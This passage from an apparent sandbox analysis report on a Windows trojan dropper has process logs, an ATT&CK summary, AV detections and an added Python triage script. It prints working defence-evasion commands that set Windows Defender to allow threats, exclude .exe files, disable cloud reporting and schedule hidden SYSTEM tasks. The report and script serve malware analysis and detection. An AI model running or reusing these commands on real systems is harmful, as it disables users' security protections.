\"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\"
Source: C:\Users\user\AppData\Local\Temp\COVpFhPtqYPoUNuBL\zKYzpPsGIVIslMC\KZDOWch.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\COVpFhPtqYPoUNuBL\zKYzpPsGIVIslMC\KZDOWch.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\COVpFhPtqYPoUNuBL\zKYzpPsGIVIslMC\KZDOWch.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\COVpFhPtqYPoUNuBL\zKYzpPsGIVIslMC\KZDOWch.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\COVpFhPtqYPoUNuBL\zKYzpPsGIVIslMC\KZDOWch.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\COVpFhPtqYPoUNuBL\zKYzpPsGIVIslMC\KZDOWch.exe | Process created: unknown unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\gpscript.exe gpscript.exe /RefreshSystemParam
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: unknown unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: unknown unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
Source: C:\Users\user\AppData\Local\Temp\7zS7E6E.tmp\Install.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00414B04 EntryPoint,GetVersion,GetCommandLineA,GetStartupInfoA,GetModuleHandleA,0_2_00414B04

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Users\user\AppData\Local\Temp\7zS7E6E.tmp\Install.exe | File written: C:\Windows\System32\GroupPolicy\gpt.ini
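The process-creation evidence above is the core of this sample's defence evasion: Windows Defender policy keys are written through forfiles.exe and PowerShell proxies (ThreatIDDefaultAction set to 6 for a list of threat IDs, an "exe" entry under Exclusions\Extensions, SpyNetReporting set to 0), a one-shot scheduled task runs an -EncodedCommand, and a second task runs the dropped KZDOWch.exe as SYSTEM. The triage helper below is an added example and is not part of the Joe Sandbox report or of the sample. Its input lines are constructed from the evidence above (the ThreatIDDefaultAction chain is cut down to two IDs); the ThreatAction mapping is Microsoft's documented Defender enumeration, in which 6 is Allow; the function and finding names are the example's own.

```python
"""Triage helper for the process-creation evidence above.  Added example, not
part of the Joe Sandbox report: splits chained `reg add` calls, decodes
PowerShell -EncodedCommand payloads and names the Windows Defender policy
settings being written.  SAMPLE_CMDLINES are constructed from the report's
evidence (the ThreatIDDefaultAction chain is cut down to two threat IDs)."""
import base64
import re

DEFENDER_POLICY = r"hklm\software\policies\microsoft\windows defender"
# ThreatAction values Defender reads from Threats\ThreatIDDefaultAction
# (Microsoft's documented enum; 6 = Allow suppresses the detection).
THREAT_ACTION = {"1": "Clean", "2": "Quarantine", "3": "Remove", "6": "Allow",
                 "8": "UserDefined", "9": "NoAction", "10": "Block"}

SAMPLE_CMDLINES = [
    r'powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64"',
    r'C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&',
    r'REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64',
    r'schtasks /CREATE /TN "goSRLihgj" /SC once /ST 00:45:25 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="',
    r'schtasks /CREATE /TN "bbrwVHWbINAVAbZleQ" /SC once /ST 16:12:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\COVpFhPtqYPoUNuBL\zKYzpPsGIVIslMC\KZDOWch.exe\" UB /site_id 525403 /S" /V1 /F',
    # Lower-cased copy as the Sigma view renders it: case folding destroys
    # the base64, so the decoder must say so instead of emitting garbage.
    r'schtasks /create /tn "gosrlihgj" /sc once /st 00:45:25 /f /ru "user" /tr "powershell -windowstyle hidden -encodedcommand cwb0ageacgb0ac0acabyag8aywblahmacwagac0avwbpag4azabvahcauwb0ahkabablacaasabpagqazablag4aiabnahaadqbwagqayqb0agualgblahgazqagac8azgbvahiaywblaa=="',
]

REG_SEGMENT = re.compile(r'reg(?:\.exe)?"?\s+add\s+"?(?P<key>hk[^"]*?)"?\s+(?P<args>/.*)$', re.I | re.S)
REG_FLAGS = {"name": r'/v\s+"?([^"\s]+)', "type": r'/t\s+(\S+)',
             "data": r'/d\s+"?([^"\s]+)', "view": r'/reg:(32|64)'}
ENCODED = re.compile(r'-e[a-z]*\s+"?([A-Za-z0-9+/=]{16,})', re.I)
FORFILES = re.compile(r'forfiles(?:\.exe)?"?\s.*?/m\s+(\S+)\s+/c\s', re.I)


def _normalize(cmdline):
    """Undo the escaped quotes the sandbox logs for nested command lines."""
    return cmdline.replace('\\"', '"')


def parse_reg_adds(cmdline):
    """Return one dict per `reg add` in a command line chained with ; or &."""
    records = []
    for segment in re.split(r"[;&]", _normalize(cmdline)):
        m = REG_SEGMENT.search(segment)
        if not m:
            continue
        rec = {"key": m.group("key").strip().lower()}
        for field, pattern in REG_FLAGS.items():
            f = re.search(pattern, m.group("args"), re.I)
            rec[field] = f.group(1).lower() if f else None
        records.append(rec)
    return records


def assess_reg_add(rec):
    """Describe a write under the Defender policy key; None for other keys."""
    if not rec["key"].startswith(DEFENDER_POLICY):
        return None
    sub = rec["key"][len(DEFENDER_POLICY):].strip("\\")
    view = "/reg:%s" % rec["view"]
    if sub == "threats\\threatiddefaultaction":
        action = THREAT_ACTION.get(rec["data"], "unknown(%s)" % rec["data"])
        return "threat ID %s default action set to %s %s" % (rec["name"], action, view)
    if sub.startswith("exclusions\\"):
        return "%s exclusion added for '%s' %s" % (sub.split("\\")[-1], rec["name"], view)
    if sub == "spynet" and rec["name"] == "spynetreporting" and rec["data"] == "0":
        return "MAPS/SpyNet cloud reporting disabled %s" % view
    return "other Defender policy write %s\\%s=%s %s" % (sub, rec["name"], rec["data"], view)


def decode_encoded_command(cmdline):
    """Decode a -EncodedCommand payload (base64 of UTF-16LE).  None when the
    line carries none; a marker when the bytes cannot be a real script."""
    m = ENCODED.search(cmdline)
    if not m:
        return None
    try:
        text = base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except ValueError:  # binascii.Error and UnicodeDecodeError both subclass it
        return "<undecodable payload>"
    return text if text.isascii() and text.isprintable() else "<undecodable payload>"


def triage(cmdline):
    """Collect the findings for one logged process-creation command line."""
    norm = _normalize(cmdline)
    findings = []
    m = FORFILES.search(norm)
    if m:
        findings.append("forfiles.exe used to proxy-execute %s" % m.group(1))
    findings += [f for f in map(assess_reg_add, parse_reg_adds(cmdline)) if f]
    if re.search(r'schtasks(?:\.exe)?"?\s+/create', norm, re.I):
        tn, ru, tr = (re.search(p, norm, re.I) for p in
                      (r'/tn\s+"?([^"\s]+)', r'/ru\s+"?([^"\s]+)', r'/tr\s+"*([^"]+)'))
        target = tr.group(1).strip() if tr else "?"
        findings.append("scheduled task %s runs as %s: %s" % (
            tn.group(1) if tn else "?", ru.group(1) if ru else "?", target))
        if ru and ru.group(1).lower() == "system" and "\\temp\\" in target.lower():
            findings.append("SYSTEM task launches %s from a Temp directory" % target)
    decoded = decode_encoded_command(norm)
    if decoded:
        findings.append("encoded PowerShell decodes to: %s" % decoded)
    return findings


if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        print(line[:72] + "...")
        for finding in triage(line):
            print("    -", finding)
```

Three details from the evidence are worth keeping in mind when reading the output. Every policy write is issued twice, once with /reg:32 and once with /reg:64, so a check that only looks at one registry view misses half of them. The task named goSRLihgj decodes to `start-process -WindowStyle Hidden gpupdate.exe /force`, which matches the gpupdate.exe /force launch and the gpt.ini write logged above, i.e. the sample forces a Group Policy refresh after writing the policy keys. Finally, the lower-cased copies of the command lines (the Sigma-normalised entries) cannot be decoded because base64 is case-sensitive; decode from the original-case entry, never from the normalised one.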
MITRE ATT&CK Matrix (the 14-column matrix was flattened during extraction; it is rendered here per tactic, listing only the techniques the report flags. The digits in front of a technique are the report's signature-count badges, reproduced as rendered; unflagged template cells are omitted.)

Initial Access: no flagged techniques
Execution: 1 Windows Management Instrumentation; 21 Command and Scripting Interpreter; 11 Scheduled Task/Job; 1 Native API; 2 PowerShell
Persistence: 11 Scheduled Task/Job
Privilege Escalation: 11 Process Injection; 11 Scheduled Task/Job
Defense Evasion: 2 Masquerading; 1 Disable or Modify Tools; 1 Modify Registry; 41 Virtualization/Sandbox Evasion; 11 Process Injection; 11 Deobfuscate/Decode Files or Information; 2 Obfuscated Files or Information; 1 File Deletion
Credential Access: 1 Input Capture
Discovery: 131 Security Software Discovery; 1 Process Discovery; 41 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 4 File and Directory Discovery; 23 System Information Discovery
Lateral Movement: no flagged techniques
Collection: 1 Input Capture; 1 Archive Collected Data
Exfiltration: no flagged techniques
Command and Control: 1 Encrypted Channel
Network Effects, Remote Service Effects, Impact: no flagged techniques
Behavior Graph ID: 776315 | Sample: file.exe | Start date: 31/12/2022 | Architecture: WINDOWS | Score: 88
(The graph image and its icon legend did not survive extraction; the process tree, dropped files and per-process signatures it encoded are rendered below as text.)
Top-level signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Sigma detected: Schedule system process; 2 other signatures

file.exe
|   drops C:\Users\user\AppData\Local\...\Install.exe (PE32)
+-- Install.exe
    |   drops C:\Users\user\AppData\Local\...\Install.exe (PE32)
    +-- Install.exe
        |   drops C:\Users\user\AppData\Local\...\KZDOWch.exe (PE32)
        |   drops C:\Windows\System32\GroupPolicy\gpt.ini (ASCII)
        |   signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Uses schtasks.exe or at.exe to add and modify task schedules; Modifies Group Policy settings
        +-- forfiles.exe
        |   +-- cmd.exe  (Uses cmd line tools excessively to alter registry or file data)
        |   |   +-- reg.exe
        |   |   +-- reg.exe
        |   +-- conhost.exe
        +-- forfiles.exe
        |   +-- cmd.exe
        |   |   +-- reg.exe
        |   |   +-- reg.exe
        |   +-- conhost.exe
        +-- schtasks.exe
        |   +-- conhost.exe
        +-- 3 other processes (three conhost.exe children)

KZDOWch.exe  (top-level node in the graph)
|   drops C:\Windows\Temp\...\YLNoErO.exe (PE32)
|   signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Very long command line found
+-- powershell.exe  (Uses cmd line tools excessively to alter registry or file data)
    +-- cmd.exe  (Uses cmd line tools excessively to alter registry or file data)
    |   +-- reg.exe
    +-- conhost.exe
    +-- gpscript.exe
    +-- 20 other processes

powershell.exe  (top-level node in the graph)
+-- gpupdate.exe
|   +-- conhost.exe
+-- conhost.exe

No Antivirus matches

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\7zS7E6E.tmp\Install.exe | 100% | Avira | HEUR/AGEN.1250601
C:\Users\user\AppData\Local\Temp\COVpFhPtqYPoUNuBL\zKYzpPsGIVIslMC\KZDOWch.exe | 100% | Avira | HEUR/AGEN.1250601
C:\Windows\Temp\CTQYLaFGBwgBLVnC\XOWTqVpevqJTLBZ\YLNoErO.exe | 100% | Avira | HEUR/AGEN.1250601
C:\Users\user\AppData\Local\Temp\7zS7E6E.tmp\Install.exe | 65% | ReversingLabs | Win32.Trojan.Barys
C:\Users\user\AppData\Local\Temp\COVpFhPtqYPoUNuBL\zKYzpPsGIVIslMC\KZDOWch.exe | 65% | ReversingLabs | Win32.Trojan.Barys
C:\Windows\Temp\CTQYLaFGBwgBLVnC\XOWTqVpevqJTLBZ\YLNoErO.exe | 65% | ReversingLabs | Win32.Trojan.Barys

Source | Detection | Scanner | Label
23.0.KZDOWch.exe.df0000.0.unpack | 100% | Avira | HEUR/AGEN.1250601
23.2.KZDOWch.exe.df0000.0.unpack | 100% | Avira | HEUR/AGEN.1250601
2.2.Install.exe.920000.0.unpack | 100% | Avira | HEUR/AGEN.1250601
2.0.Install.exe.920000.0.unpack | 100% | Avira | HEUR/AGEN.1250601

No Antivirus matches

Source | Detection | Scanner | Label
http://crl.m | 0% | URL Reputation | safe
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
https://contoso.com/ | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
No contacted domains info

Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000011.00000002.418333366.0000020362523000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.416535432.00000203623EC000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://crl.m | powershell.exe, 00000011.00000002.363453678.0000020350765000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000011.00000002.370748414.0000020352583000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000011.00000002.364982026.0000020352381000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.431937446.0000000003E01000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000011.00000002.370748414.0000020352583000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://github.com/Pester/Pester | powershell.exe, 00000011.00000002.370748414.0000020352583000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://contoso.com/ | powershell.exe, 00000011.00000002.416535432.00000203623EC000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000011.00000002.418333366.0000020362523000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.416535432.00000203623EC000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://contoso.com/License | powershell.exe, 00000011.00000002.416535432.00000203623EC000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000011.00000002.416535432.00000203623EC000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown

No contacted IP infos
Joe Sandbox Version: 36.0.0 Rainbow Opal
Analysis ID: 776315
Start date and time: 2022-12-31 16:10:08 +01:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 9m 51s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: file.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed: 59
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
